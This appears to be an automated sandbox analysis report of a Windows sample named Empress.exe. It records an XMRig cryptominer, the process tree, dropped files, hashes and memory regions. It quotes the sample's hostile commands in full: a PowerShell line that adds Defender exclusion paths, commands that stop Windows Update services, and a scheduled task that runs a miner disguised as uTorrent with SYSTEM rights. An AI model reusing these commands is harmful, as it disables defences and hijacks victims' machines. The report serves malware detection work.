Analysis

  • max time kernel
    304s
  • max time network
    316s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/08/2023, 19:57

General

  • Target

    Empress/Empress.exe

  • Size

    680.4MB

  • MD5

    b7b4e0558eb6188abc6e17d77abb4f73

  • SHA1

    22851c79469486055efc62599a25eb4e1f8cc8b1

  • SHA256

    998997122e364144750a72db4049d50e38e6a879b0c67bd92ff5f6a549c7f2f5

  • SHA512

    638827eb702d032bf9f045854c1a79cd3bb841c9147ddd66fce98d91072bcd67338ae7214a248f8b0c8e43a68c8af48d2991a5ecae9df4e35666cf0477529cc3

  • SSDEEP

    196608:gomVwAoiSs79XEVmNmbGHDoKUrUNQ9SzsIW8YtuNfU/:goqwAoSREVmDjzfIuNfU/

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 5 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 3 IoCs
  • Themida packer 22 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3140
      • C:\Users\Admin\AppData\Local\Temp\Empress\Empress.exe
        "C:\Users\Admin\AppData\Local\Temp\Empress\Empress.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Users\Admin\AppData\Roaming\[New]3.exe
          C:\Users\Admin\AppData\Roaming\[New]3.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          PID:2172
        • C:\Users\Admin\AppData\Roaming\[New]crypted.exe
          C:\Users\Admin\AppData\Roaming\[New]crypted.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2816
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:780
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 996
              5⤵
              • Program crash
              PID:1792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4236
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1492
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4496
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:2204
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2952
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kssonkvq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'AppData' /tr '''C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AppData' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3132
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\[New]3.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:3872
        • C:\Windows\System32\schtasks.exe
          C:\Windows\System32\schtasks.exe /run /tn "AppData"
          2⤵
            PID:1080
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1736
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3132
            • C:\Windows\System32\sc.exe
              sc stop UsoSvc
              3⤵
              • Launches sc.exe
              PID:912
            • C:\Windows\System32\sc.exe
              sc stop WaaSMedicSvc
              3⤵
              • Launches sc.exe
              PID:1784
            • C:\Windows\System32\sc.exe
              sc stop wuauserv
              3⤵
              • Launches sc.exe
              PID:2352
            • C:\Windows\System32\sc.exe
              sc stop bits
              3⤵
              • Launches sc.exe
              PID:3752
            • C:\Windows\System32\sc.exe
              sc stop dosvc
              3⤵
              • Launches sc.exe
              PID:4092
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kssonkvq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'AppData' /tr '''C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AppData' -User 'System' -RunLevel 'Highest' -Force; }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1120
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe
            2⤵
              PID:1508
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe
              2⤵
                PID:4684
            • C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe
              "C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe"
              1⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2828
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 780 -ip 780
              1⤵
                PID:2860

              Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe

                      Filesize

                      678.7MB

                      MD5

                      5a0bccfe6d74400f7d85d1fdde17d0cb

                      SHA1

                      52651d2bb9d43087173d43f35bb10cece676e1b1

                      SHA256

                      794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99

                      SHA512

                      2bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb

                    • C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe

                      Filesize

                      678.7MB

                      MD5

                      5a0bccfe6d74400f7d85d1fdde17d0cb

                      SHA1

                      52651d2bb9d43087173d43f35bb10cece676e1b1

                      SHA256

                      794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99

                      SHA512

                      2bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      944B

                      MD5

                      bd5940f08d0be56e65e5f2aaf47c538e

                      SHA1

                      d7e31b87866e5e383ab5499da64aba50f03e8443

                      SHA256

                      2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                      SHA512

                      c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x3um3xnd.3f3.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\fdf8a2f78b1bbc337cc3476908958aab\Admin@[email protected]\Processes.txt

                      Filesize

                      5KB

                      MD5

                      071b8b89dc3e6f10120315d86accddc8

                      SHA1

                      e0c98b14dec0fadb523e4a86cac778cc86841fc6

                      SHA256

                      fde9d2f2d64da4e88b2e71d31e8a1792d91734b223c7cfc45e11d16f507af610

                      SHA512

                      21705562130d396cb48630fee61665cd6a2aa99ee94b55340537e8a7d43be10ee2aa835854624d90e3b6417190253de5fe947f27529a9a768b2701d8eeee37fd

                    • C:\Users\Admin\AppData\Local\fdf8a2f78b1bbc337cc3476908958aab\Admin@[email protected]\Software.txt

                      Filesize

                      4KB

                      MD5

                      4d469fcd07d1ee0a57b64c5ad3a80d22

                      SHA1

                      17b0b8600cbe0015c1d3792a05cd5faa69e986e2

                      SHA256

                      8a90a8506281a7c79e22c746bb5c0e1900753905d39c3b2cf075889f12566f49

                      SHA512

                      0722c29314d54ec23cee1a7e53009ac9295f54aeb5a59760181233c38c8ef96ce5e141915e20b4ae5c6f1efea13b7952698881fa5e7bed7d7ea7d77047b847a6

                    • C:\Users\Admin\AppData\Local\fdf8a2f78b1bbc337cc3476908958aab\msgid.dat

                      Filesize

                      13B

                      MD5

                      52e2479d75e086f9c280ec6ab5ae4fe6

                      SHA1

                      2750d987041c869ebc4be655f31b5803a677fb8b

                      SHA256

                      7f4007c917578896645f1844af5459e9218c709da14c5465e687ca61604a3de6

                      SHA512

                      d74deb991dcc9c83c86989040405752caefc9313e5f20ca64fcf1c96a278bfd381ebf58e7ac9fc67aea0e699bdaa915319945ab7a1a0daab3ba4279f9774d1ff

                    • C:\Users\Admin\AppData\Roaming\[New]3.exe

                      Filesize

                      678.7MB

                      MD5

                      5a0bccfe6d74400f7d85d1fdde17d0cb

                      SHA1

                      52651d2bb9d43087173d43f35bb10cece676e1b1

                      SHA256

                      794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99

                      SHA512

                      2bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb

                    • C:\Users\Admin\AppData\Roaming\[New]3.exe

                      Filesize

                      678.7MB

                      MD5

                      5a0bccfe6d74400f7d85d1fdde17d0cb

                      SHA1

                      52651d2bb9d43087173d43f35bb10cece676e1b1

                      SHA256

                      794eb5198ce2e7b8dae24bad2c4f4ff22beec2930df07c086fc61ec6d72aeb99

                      SHA512

                      2bc7126650008c9ff26a0a155132598ab614208499d75900f94141e6a526c2fa2c0823ce108f70f3ac92249d0cb68961dd5c0bc1f4180e72d09815c46ed3abeb

                    • C:\Users\Admin\AppData\Roaming\[New]crypted.exe

                      Filesize

                      672.2MB

                      MD5

                      fe278bbf875f16367f5277e2cdf77378

                      SHA1

                      c46596c43c1a7084fa680c07ce4c7d120396f009

                      SHA256

                      5015ac560225bffcb4d4131d3920213ac3d2ab6a2a2341756cb035ddfe46a7d5

                      SHA512

                      c147f9200cea46689e3109758aa2b57d5e2d5c77ffe568ad544548344b41c4a240a5aaddeeb6a6489deb1b4367b6a7bba42d7b2dbf8b9c17fb6c9a2ec793f60a

                    • C:\Users\Admin\AppData\Roaming\[New]crypted.exe

                      Filesize

                      672.2MB

                      MD5

                      fe278bbf875f16367f5277e2cdf77378

                      SHA1

                      c46596c43c1a7084fa680c07ce4c7d120396f009

                      SHA256

                      5015ac560225bffcb4d4131d3920213ac3d2ab6a2a2341756cb035ddfe46a7d5

                      SHA512

                      c147f9200cea46689e3109758aa2b57d5e2d5c77ffe568ad544548344b41c4a240a5aaddeeb6a6489deb1b4367b6a7bba42d7b2dbf8b9c17fb6c9a2ec793f60a

                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      4KB

                      MD5

                      bdb25c22d14ec917e30faf353826c5de

                      SHA1

                      6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                      SHA256

                      e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                      SHA512

                      b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      4af092e31db1384ca141f50e2754eeea

                      SHA1

                      5e6e8c987ed9df9c9bb373227c2c8dcfde24ccef

                      SHA256

                      60e3e9177b248839a957af720477f1389a10334123eb6cb12ae347e40ab53f53

                      SHA512

                      a4ac31719fcb1b0b594806b5d56fc2c335de7901538542aeffe0f78b9710aa5aecc78146ab5d131d32b56405df59c4f2be50bcafb7494d4996c154b39f8bf4fd

                    • memory/780-64-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

                      Filesize

                      64KB

                    • memory/780-62-0x0000000075330000-0x0000000075AE0000-memory.dmp

                      Filesize

                      7.7MB

                    • memory/780-282-0x0000000075330000-0x0000000075AE0000-memory.dmp

                      Filesize

                      7.7MB

                    • memory/780-61-0x0000000000400000-0x000000000041E000-memory.dmp

                      Filesize

                      120KB

                    • memory/780-63-0x0000000004A00000-0x0000000004A66000-memory.dmp

                      Filesize

                      408KB

                    • memory/780-90-0x0000000006330000-0x00000000068D4000-memory.dmp

                      Filesize

                      5.6MB

                    • memory/780-262-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

                      Filesize

                      64KB

                    • memory/780-65-0x0000000075330000-0x0000000075AE0000-memory.dmp

                      Filesize

                      7.7MB

                    • memory/780-66-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

                      Filesize

                      64KB

                    • memory/780-88-0x0000000005CE0000-0x0000000005D72000-memory.dmp

                      Filesize

                      584KB

                    • memory/780-224-0x00000000005A0000-0x00000000005B2000-memory.dmp

                      Filesize

                      72KB

                    • memory/780-223-0x0000000000500000-0x000000000050A000-memory.dmp

                      Filesize

                      40KB

                    • memory/780-182-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-295-0x00007FF4A9EC0000-0x00007FF4A9ED0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-325-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1120-278-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1120-279-0x000001E6DF890000-0x000001E6DF8A0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-311-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1120-312-0x000001E6DF890000-0x000001E6DF8A0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-317-0x000001E6DF890000-0x000001E6DF8A0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-318-0x000001E6DF890000-0x000001E6DF8A0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-319-0x000001E6DF890000-0x000001E6DF8A0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1120-320-0x000001E6DF890000-0x000001E6DF8A0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1508-332-0x00007FF669A20000-0x00007FF669A4A000-memory.dmp

                      Filesize

                      168KB

                    • memory/1508-339-0x00007FF669A20000-0x00007FF669A4A000-memory.dmp

                      Filesize

                      168KB

                    • memory/1736-294-0x000001E0FF840000-0x000001E0FF84A000-memory.dmp

                      Filesize

                      40KB

                    • memory/1736-281-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-316-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1736-313-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-310-0x000001E0FF850000-0x000001E0FF85A000-memory.dmp

                      Filesize

                      40KB

                    • memory/1736-309-0x000001E080E90000-0x000001E080E96000-memory.dmp

                      Filesize

                      24KB

                    • memory/1736-307-0x000001E080E80000-0x000001E080E88000-memory.dmp

                      Filesize

                      32KB

                    • memory/1736-306-0x000001E0FF9D0000-0x000001E0FF9EA000-memory.dmp

                      Filesize

                      104KB

                    • memory/1736-305-0x00007FF4DAAE0000-0x00007FF4DAAF0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-292-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-280-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-277-0x000001E0FF8A0000-0x000001E0FF8BC000-memory.dmp

                      Filesize

                      112KB

                    • memory/1736-276-0x000001E0E7360000-0x000001E0E736A000-memory.dmp

                      Filesize

                      40KB

                    • memory/1736-275-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1736-264-0x00007FF4DAAE0000-0x00007FF4DAAF0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-274-0x000001E080C60000-0x000001E080C7C000-memory.dmp

                      Filesize

                      112KB

                    • memory/1736-245-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1736-246-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-247-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1736-259-0x000001E0FF8C0000-0x000001E0FF8D0000-memory.dmp

                      Filesize

                      64KB

                    • memory/2172-27-0x00007FFA8C0F0000-0x00007FFA8C2E5000-memory.dmp

                      Filesize

                      2.0MB

                    • memory/2172-3-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-5-0x00007FFA8C0F0000-0x00007FFA8C2E5000-memory.dmp

                      Filesize

                      2.0MB

                    • memory/2172-6-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-7-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-8-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-9-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-10-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-33-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-57-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-24-0x00007FF70C580000-0x00007FF70D459000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2172-59-0x00007FFA8C0F0000-0x00007FFA8C2E5000-memory.dmp

                      Filesize

                      2.0MB

                    • memory/2828-137-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-329-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-293-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-261-0x00007FFA8C0F0000-0x00007FFA8C2E5000-memory.dmp

                      Filesize

                      2.0MB

                    • memory/2828-231-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-143-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-140-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-138-0x00007FFA8C0F0000-0x00007FFA8C2E5000-memory.dmp

                      Filesize

                      2.0MB

                    • memory/2828-257-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-135-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/2828-133-0x00007FF6A9010000-0x00007FF6A9EE9000-memory.dmp

                      Filesize

                      14.8MB

                    • memory/3132-37-0x000001EAF31B0000-0x000001EAF31C0000-memory.dmp

                      Filesize

                      64KB

                    • memory/3132-51-0x000001EAF31B0000-0x000001EAF31C0000-memory.dmp

                      Filesize

                      64KB

                    • memory/3132-35-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/3132-53-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/3132-36-0x000001EAF31B0000-0x000001EAF31C0000-memory.dmp

                      Filesize

                      64KB

                    • memory/3132-50-0x000001EAF31B0000-0x000001EAF31C0000-memory.dmp

                      Filesize

                      64KB

                    • memory/3132-49-0x00007FFA6E100000-0x00007FFA6EBC1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4236-17-0x000002A4EA180000-0x000002A4EA1A2000-memory.dmp

                      Filesize

                      136KB

                    • memory/4236-25-0x000002A4E8100000-0x000002A4E8110000-memory.dmp

                      Filesize

                      64KB

                    • memory/4236-23-0x000002A4E8100000-0x000002A4E8110000-memory.dmp

                      Filesize

                      64KB

                    • memory/4236-22-0x00007FFA6DF90000-0x00007FFA6EA51000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4236-32-0x00007FFA6DF90000-0x00007FFA6EA51000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/4236-29-0x000002A4E8100000-0x000002A4E8110000-memory.dmp

                      Filesize

                      64KB

                    • memory/4684-330-0x000001F7644C0000-0x000001F7644E0000-memory.dmp

                      Filesize

                      128KB

                    • memory/4684-333-0x00007FF7DED90000-0x00007FF7DF57F000-memory.dmp

                      Filesize

                      7.9MB

                    • memory/4684-335-0x00007FF7DED90000-0x00007FF7DF57F000-memory.dmp

                      Filesize

                      7.9MB

                    • memory/4684-338-0x00007FF7DED90000-0x00007FF7DF57F000-memory.dmp

                      Filesize

                      7.9MB

                    • memory/4684-340-0x00007FF7DED90000-0x00007FF7DF57F000-memory.dmp

                      Filesize

                      7.9MB